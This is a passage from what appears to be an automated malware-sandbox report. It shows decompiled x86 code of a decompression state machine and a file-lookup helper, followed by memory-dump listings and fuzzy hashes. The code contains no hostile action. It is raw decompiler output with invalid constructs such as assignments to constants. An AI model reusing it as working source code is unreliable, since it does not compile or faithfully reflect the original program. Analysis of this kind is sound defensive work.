              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								 *(__ebp - 0x40) = 1;
              								__cx = __ax >> 5;
              								__ebx = __ebx + __ebx + 1;
              								 *__esi = __ax;
              							} else {
              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edx;
              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							 *(__ebp - 0x44) = __ebx;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								L38:
              								__eax =  *(__ebp - 0x40);
              								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              									while(1) {
              										if(__ebx >= 0x100) {
              											break;
              										}
              										__eax =  *(__ebp - 0x58);
              										__edx = __ebx + __ebx;
              										__ecx =  *(__ebp - 0x10);
              										__esi = __edx + __eax;
              										__ecx =  *(__ebp - 0x10) >> 0xb;
              										__ax =  *__esi;
              										 *(__ebp - 0x54) = __esi;
              										__edi = __ax & 0x0000ffff;
              										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              										if( *(__ebp - 0xc) >= __ecx) {
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              											__cx = __ax;
              											_t169 = __edx + 1; // 0x1
              											__ebx = _t169;
              											__cx = __ax >> 5;
              											 *__esi = __ax;
              										} else {
              											 *(__ebp - 0x10) = __ecx;
              											0x800 = 0x800 - __edi;
              											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              											__ebx = __ebx + __ebx;
              											 *__esi = __cx;
              										}
              										 *(__ebp - 0x44) = __ebx;
              										if( *(__ebp - 0x10) < 0x1000000) {
              											L45:
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xe;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t155 = __ebp - 0x70;
              											 *_t155 =  *(__ebp - 0x70) + 1;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              										}
              									}
              									L53:
              									_t172 = __ebp - 0x34;
              									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
              									L54:
              									__al =  *(__ebp - 0x44);
              									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              									L55:
              									if( *(__ebp - 0x64) == 0) {
              										 *(__ebp - 0x88) = 0x1a;
              										goto L170;
              									}
              									__ecx =  *(__ebp - 0x68);
              									__al =  *(__ebp - 0x5c);
              									__edx =  *(__ebp - 8);
              									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              									 *( *(__ebp - 0x68)) = __al;
              									__ecx =  *(__ebp - 0x14);
              									 *(__ecx +  *(__ebp - 8)) = __al;
              									__eax = __ecx + 1;
              									__edx = 0;
              									_t191 = __eax %  *(__ebp - 0x74);
              									__eax = __eax /  *(__ebp - 0x74);
              									__edx = _t191;
              									L79:
              									 *(__ebp - 0x14) = __edx;
              									L80:
              									 *(__ebp - 0x88) = 2;
              									goto L1;
              								}
              								if(__ebx >= 0x100) {
              									goto L53;
              								}
              								goto L40;
              							} else {
              								L36:
              								if( *(__ebp - 0x6c) == 0) {
              									 *(__ebp - 0x88) = 0xd;
              									L170:
              									_t568 = 0x22;
              									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
              									_t535 = 0;
              									L172:
              									return _t535;
              								}
              								__ecx =  *(__ebp - 0x70);
              								__eax =  *(__ebp - 0xc);
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              								_t121 = __ebp - 0x70;
              								 *_t121 =  *(__ebp - 0x70) + 1;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              								goto L38;
              							}
              						}
              					}
              					L1:
              					_t534 =  *(_t614 - 0x88);
              					if(_t534 > 0x1c) {
              						L171:
              						_t535 = _t534 | 0xffffffff;
              						goto L172;
              					}
              					switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
              						case 0:
              							if( *(_t614 - 0x6c) == 0) {
              								goto L170;
              							}
              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
              							_t534 =  *( *(_t614 - 0x70));
              							if(_t534 > 0xe1) {
              								goto L171;
              							}
              							_t538 = _t534 & 0x000000ff;
              							_push(0x2d);
              							asm("cdq");
              							_pop(_t570);
              							_push(9);
              							_pop(_t571);
              							_t610 = _t538 / _t570;
              							_t540 = _t538 % _t570 & 0x000000ff;
              							asm("cdq");
              							_t605 = _t540 % _t571 & 0x000000ff;
              							 *(_t614 - 0x3c) = _t605;
              							 *(_t614 - 0x1c) = (1 << _t610) - 1;
              							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
              							_t613 = (0x300 << _t605 + _t610) + 0x736;
              							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
              								L10:
              								if(_t613 == 0) {
              									L12:
              									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
              									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
              									goto L15;
              								} else {
              									goto L11;
              								}
              								do {
              									L11:
              									_t613 = _t613 - 1;
              									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
              								} while (_t613 != 0);
              								goto L12;
              							}
              							if( *(_t614 - 4) != 0) {
              								GlobalFree( *(_t614 - 4));
              							}
              							_t534 = GlobalAlloc(0x40, 0x600); // executed
              							 *(_t614 - 4) = _t534;
              							if(_t534 == 0) {
              								goto L171;
              							} else {
              								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
              								goto L10;
              							}
              						case 1:
              							L13:
              							__eflags =  *(_t614 - 0x6c);
              							if( *(_t614 - 0x6c) == 0) {
              								 *(_t614 - 0x88) = 1;
              								goto L170;
              							}
              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
              							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
              							_t45 = _t614 - 0x48;
              							 *_t45 =  *(_t614 - 0x48) + 1;
              							__eflags =  *_t45;
              							L15:
              							if( *(_t614 - 0x48) < 4) {
              								goto L13;
              							}
              							_t546 =  *(_t614 - 0x40);
              							if(_t546 ==  *(_t614 - 0x74)) {
              								L20:
              								 *(_t614 - 0x48) = 5;
              								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
              								goto L23;
              							}
              							 *(_t614 - 0x74) = _t546;
              							if( *(_t614 - 8) != 0) {
              								GlobalFree( *(_t614 - 8));
              							}
              							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
              							 *(_t614 - 8) = _t534;
              							if(_t534 == 0) {
              								goto L171;
              							} else {
              								goto L20;
              							}
              						case 2:
              							L24:
              							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
              							 *(_t614 - 0x84) = 6;
              							 *(_t614 - 0x4c) = _t553;
              							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
              							goto L132;
              						case 3:
              							L21:
              							__eflags =  *(_t614 - 0x6c);
              							if( *(_t614 - 0x6c) == 0) {
              								 *(_t614 - 0x88) = 3;
              								goto L170;
              							}
              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
              							_t67 = _t614 - 0x70;
              							 *_t67 =  &(( *(_t614 - 0x70))[1]);
              							__eflags =  *_t67;
              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
              							L23:
              							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
              							if( *(_t614 - 0x48) != 0) {
              								goto L21;
              							}
              							goto L24;
              						case 4:
              							goto L133;
              						case 5:
              							goto L137;
              						case 6:
              							goto L0;
              						case 7:
              							__eflags =  *(__ebp - 0x40) - 1;
              							if( *(__ebp - 0x40) != 1) {
              								__eax =  *(__ebp - 0x24);
              								 *(__ebp - 0x80) = 0x16;
              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
              								__eax =  *(__ebp - 0x28);
              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
              								__eax =  *(__ebp - 0x2c);
              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              								__eax = 0;
              								__eflags =  *(__ebp - 0x38) - 7;
              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              								__al = __al & 0x000000fd;
              								__eax = (__eflags >= 0) - 1 + 0xa;
              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              								__eax =  *(__ebp - 4);
              								__eax =  *(__ebp - 4) + 0x664;
              								__eflags = __eax;
              								 *(__ebp - 0x58) = __eax;
              								goto L68;
              							}
              							__eax =  *(__ebp - 4);
              							__ecx =  *(__ebp - 0x38);
              							 *(__ebp - 0x84) = 8;
              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              							goto L132;
              						case 8:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x84) = 0xa;
              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              							} else {
              								__eax =  *(__ebp - 0x38);
              								__ecx =  *(__ebp - 4);
              								__eax =  *(__ebp - 0x38) + 0xf;
              								 *(__ebp - 0x84) = 9;
              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              							}
              							goto L132;
              						case 9:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								goto L89;
              							}
              							__eflags =  *(__ebp - 0x60);
              							if( *(__ebp - 0x60) == 0) {
              								goto L171;
              							}
              							__eax = 0;
              							__eflags =  *(__ebp - 0x38) - 7;
              							_t258 =  *(__ebp - 0x38) - 7 >= 0;
              							__eflags = _t258;
              							0 | _t258 = _t258 + _t258 + 9;
              							 *(__ebp - 0x38) = _t258 + _t258 + 9;
              							goto L75;
              						case 0xa:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x84) = 0xb;
              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x28);
              							goto L88;
              						case 0xb:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__ecx =  *(__ebp - 0x24);
              								__eax =  *(__ebp - 0x20);
              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
              							} else {
              								__eax =  *(__ebp - 0x24);
              							}
              							__ecx =  *(__ebp - 0x28);
              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
              							L88:
              							__ecx =  *(__ebp - 0x2c);
              							 *(__ebp - 0x2c) = __eax;
              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              							L89:
              							__eax =  *(__ebp - 4);
              							 *(__ebp - 0x80) = 0x15;
              							__eax =  *(__ebp - 4) + 0xa68;
              							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              							goto L68;
              						case 0xc:
              							L99:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xc;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t334 = __ebp - 0x70;
              							 *_t334 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t334;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							__eax =  *(__ebp - 0x2c);
              							goto L101;
              						case 0xd:
              							goto L36;
              						case 0xe:
              							goto L45;
              						case 0xf:
              							goto L57;
              						case 0x10:
              							L109:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0x10;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t365 = __ebp - 0x70;
              							 *_t365 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t365;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							goto L111;
              						case 0x11:
              							L68:
              							__esi =  *(__ebp - 0x58);
              							 *(__ebp - 0x84) = 0x12;
              							goto L132;
              						case 0x12:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 0x58);
              								 *(__ebp - 0x84) = 0x13;
              								__esi =  *(__ebp - 0x58) + 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x4c);
              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              							__ecx =  *(__ebp - 0x58);
              							__eax =  *(__ebp - 0x4c) << 4;
              							__eflags = __eax;
              							__eax =  *(__ebp - 0x58) + __eax + 4;
              							goto L130;
              						case 0x13:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								_t469 = __ebp - 0x58;
              								 *_t469 =  *(__ebp - 0x58) + 0x204;
              								__eflags =  *_t469;
              								 *(__ebp - 0x30) = 0x10;
              								 *(__ebp - 0x40) = 8;
              								L144:
              								 *(__ebp - 0x7c) = 0x14;
              								goto L145;
              							}
              							__eax =  *(__ebp - 0x4c);
              							__ecx =  *(__ebp - 0x58);
              							__eax =  *(__ebp - 0x4c) << 4;
              							 *(__ebp - 0x30) = 8;
              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              							L130:
              							 *(__ebp - 0x58) = __eax;
              							 *(__ebp - 0x40) = 3;
              							goto L144;
              						case 0x14:
              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              							__eax =  *(__ebp - 0x80);
              							goto L140;
              						case 0x15:
              							__eax = 0;
              							__eflags =  *(__ebp - 0x38) - 7;
              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              							__al = __al & 0x000000fd;
              							__eax = (__eflags >= 0) - 1 + 0xb;
              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              							goto L120;
              						case 0x16:
              							__eax =  *(__ebp - 0x30);
              							__eflags = __eax - 4;
              							if(__eax >= 4) {
              								_push(3);
              								_pop(__eax);
              							}
              							__ecx =  *(__ebp - 4);
              							 *(__ebp - 0x40) = 6;
              							__eax = __eax << 7;
              							 *(__ebp - 0x7c) = 0x19;
              							 *(__ebp - 0x58) = __eax;
              							goto L145;
              						case 0x17:
              							L145:
              							__eax =  *(__ebp - 0x40);
              							 *(__ebp - 0x50) = 1;
              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
              							goto L149;
              						case 0x18:
              							L146:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0x18;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t484 = __ebp - 0x70;
              							 *_t484 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t484;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							L148:
              							_t487 = __ebp - 0x48;
              							 *_t487 =  *(__ebp - 0x48) - 1;
              							__eflags =  *_t487;
              							L149:
              							__eflags =  *(__ebp - 0x48);
              							if( *(__ebp - 0x48) <= 0) {
              								__ecx =  *(__ebp - 0x40);
              								__ebx =  *(__ebp - 0x50);
              								0 = 1;
              								__eax = 1 << __cl;
              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
              								__eax =  *(__ebp - 0x7c);
              								 *(__ebp - 0x44) = __ebx;
              								goto L140;
              							}
              							__eax =  *(__ebp - 0x50);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              							__eax =  *(__ebp - 0x58);
              							__esi = __edx + __eax;
              							 *(__ebp - 0x54) = __esi;
              							__ax =  *__esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              							__eflags =  *(__ebp - 0xc) - __ecx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								__cx = __ax >> 5;
              								__eax = __eax - __ecx;
              								__edx = __edx + 1;
              								__eflags = __edx;
              								 *__esi = __ax;
              								 *(__ebp - 0x50) = __edx;
              							} else {
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              								 *__esi = __cx;
              							}
              							__eflags =  *(__ebp - 0x10) - 0x1000000;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								goto L148;
              							} else {
              								goto L146;
              							}
              						case 0x19:
              							__eflags = __ebx - 4;
              							if(__ebx < 4) {
              								 *(__ebp - 0x2c) = __ebx;
              								L119:
              								_t393 = __ebp - 0x2c;
              								 *_t393 =  *(__ebp - 0x2c) + 1;
              								__eflags =  *_t393;
              								L120:
              								__eax =  *(__ebp - 0x2c);
              								__eflags = __eax;
              								if(__eax == 0) {
              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              									goto L170;
              								}
              								__eflags = __eax -  *(__ebp - 0x60);
              								if(__eax >  *(__ebp - 0x60)) {
              									goto L171;
              								}
              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              								__eax =  *(__ebp - 0x30);
              								_t400 = __ebp - 0x60;
              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              								__eflags =  *_t400;
              								goto L123;
              							}
              							__ecx = __ebx;
              							__eax = __ebx;
              							__ecx = __ebx >> 1;
              							__eax = __ebx & 0x00000001;
              							__ecx = (__ebx >> 1) - 1;
              							__al = __al | 0x00000002;
              							__eax = (__ebx & 0x00000001) << __cl;
              							__eflags = __ebx - 0xe;
              							 *(__ebp - 0x2c) = __eax;
              							if(__ebx >= 0xe) {
              								__ebx = 0;
              								 *(__ebp - 0x48) = __ecx;
              								L102:
              								__eflags =  *(__ebp - 0x48);
              								if( *(__ebp - 0x48) <= 0) {
              									__eax = __eax + __ebx;
              									 *(__ebp - 0x40) = 4;
              									 *(__ebp - 0x2c) = __eax;
              									__eax =  *(__ebp - 4);
              									__eax =  *(__ebp - 4) + 0x644;
              									__eflags = __eax;
              									L108:
              									__ebx = 0;
              									 *(__ebp - 0x58) = __eax;
              									 *(__ebp - 0x50) = 1;
              									 *(__ebp - 0x44) = 0;
              									 *(__ebp - 0x48) = 0;
              									L112:
              									__eax =  *(__ebp - 0x40);
              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              										_t391 = __ebp - 0x2c;
              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
              										__eflags =  *_t391;
              										goto L119;
              									}
              									__eax =  *(__ebp - 0x50);
              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              									__eax =  *(__ebp - 0x58);
              									__esi = __edi + __eax;
              									 *(__ebp - 0x54) = __esi;
              									__ax =  *__esi;
              									__ecx = __ax & 0x0000ffff;
              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              									__eflags =  *(__ebp - 0xc) - __edx;
              									if( *(__ebp - 0xc) >= __edx) {
              										__ecx = 0;
              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              										__ecx = 1;
              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              										__ebx = 1;
              										__ecx =  *(__ebp - 0x48);
              										__ebx = 1 << __cl;
              										__ecx = 1 << __cl;
              										__ebx =  *(__ebp - 0x44);
              										__ebx =  *(__ebp - 0x44) | __ecx;
              										__cx = __ax;
              										__cx = __ax >> 5;
              										__eax = __eax - __ecx;
              										__edi = __edi + 1;
              										__eflags = __edi;
              										 *(__ebp - 0x44) = __ebx;
              										 *__esi = __ax;
              										 *(__ebp - 0x50) = __edi;
              									} else {
              										 *(__ebp - 0x10) = __edx;
              										0x800 = 0x800 - __ecx;
              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              										 *__esi = __dx;
              									}
              									__eflags =  *(__ebp - 0x10) - 0x1000000;
              									if( *(__ebp - 0x10) >= 0x1000000) {
              										L111:
              										_t368 = __ebp - 0x48;
              										 *_t368 =  *(__ebp - 0x48) + 1;
              										__eflags =  *_t368;
              										goto L112;
              									} else {
              										goto L109;
              									}
              								}
              								__ecx =  *(__ebp - 0xc);
              								__ebx = __ebx + __ebx;
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              								 *(__ebp - 0x44) = __ebx;
              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              									__ecx =  *(__ebp - 0x10);
              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              									__ebx = __ebx | 0x00000001;
              									__eflags = __ebx;
              									 *(__ebp - 0x44) = __ebx;
              								}
              								__eflags =  *(__ebp - 0x10) - 0x1000000;
              								if( *(__ebp - 0x10) >= 0x1000000) {
              									L101:
              									_t338 = __ebp - 0x48;
              									 *_t338 =  *(__ebp - 0x48) - 1;
              									__eflags =  *_t338;
              									goto L102;
              								} else {
              									goto L99;
              								}
              							}
              							__edx =  *(__ebp - 4);
              							__eax = __eax - __ebx;
              							 *(__ebp - 0x40) = __ecx;
              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              							goto L108;
              						case 0x1a:
              							goto L55;
              						case 0x1b:
              							L75:
              							__eflags =  *(__ebp - 0x64);
              							if( *(__ebp - 0x64) == 0) {
              								 *(__ebp - 0x88) = 0x1b;
              								goto L170;
              							}
              							__eax =  *(__ebp - 0x14);
              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              							__eflags = __eax -  *(__ebp - 0x74);
              							if(__eax >=  *(__ebp - 0x74)) {
              								__eax = __eax +  *(__ebp - 0x74);
              								__eflags = __eax;
              							}
              							__edx =  *(__ebp - 8);
              							__cl =  *(__eax + __edx);
              							__eax =  *(__ebp - 0x14);
              							 *(__ebp - 0x5c) = __cl;
              							 *(__eax + __edx) = __cl;
              							__eax = __eax + 1;
              							__edx = 0;
              							_t274 = __eax %  *(__ebp - 0x74);
              							__eax = __eax /  *(__ebp - 0x74);
              							__edx = _t274;
              							__eax =  *(__ebp - 0x68);
              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              							_t283 = __ebp - 0x64;
              							 *_t283 =  *(__ebp - 0x64) - 1;
              							__eflags =  *_t283;
              							 *( *(__ebp - 0x68)) = __cl;
              							goto L79;
              						case 0x1c:
              							while(1) {
              								L123:
              								__eflags =  *(__ebp - 0x64);
              								if( *(__ebp - 0x64) == 0) {
              									break;
              								}
              								__eax =  *(__ebp - 0x14);
              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              								__eflags = __eax -  *(__ebp - 0x74);
              								if(__eax >=  *(__ebp - 0x74)) {
              									__eax = __eax +  *(__ebp - 0x74);
              									__eflags = __eax;
              								}
              								__edx =  *(__ebp - 8);
              								__cl =  *(__eax + __edx);
              								__eax =  *(__ebp - 0x14);
              								 *(__ebp - 0x5c) = __cl;
              								 *(__eax + __edx) = __cl;
              								__eax = __eax + 1;
              								__edx = 0;
              								_t414 = __eax %  *(__ebp - 0x74);
              								__eax = __eax /  *(__ebp - 0x74);
              								__edx = _t414;
              								__eax =  *(__ebp - 0x68);
              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              								__eflags =  *(__ebp - 0x30);
              								 *( *(__ebp - 0x68)) = __cl;
              								 *(__ebp - 0x14) = __edx;
              								if( *(__ebp - 0x30) > 0) {
              									continue;
              								} else {
              									goto L80;
              								}
              							}
              							 *(__ebp - 0x88) = 0x1c;
              							goto L170;
              					}
              				}
              			}














              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
              • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
              • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
              • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0040689A(WCHAR* _a4) {
              				void* _t2;
              
              				_t2 = FindFirstFileW(_a4, 0x426798); // executed
              				if(_t2 == 0xffffffff) {
              					return 0;
              				}
              				FindClose(_t2);
              				return 0x426798;
              			}





              APIs
              • FindFirstFileW.KERNELBASE(73BCFAA0,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 004068A5
              • FindClose.KERNEL32(00000000), ref: 004068B1
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
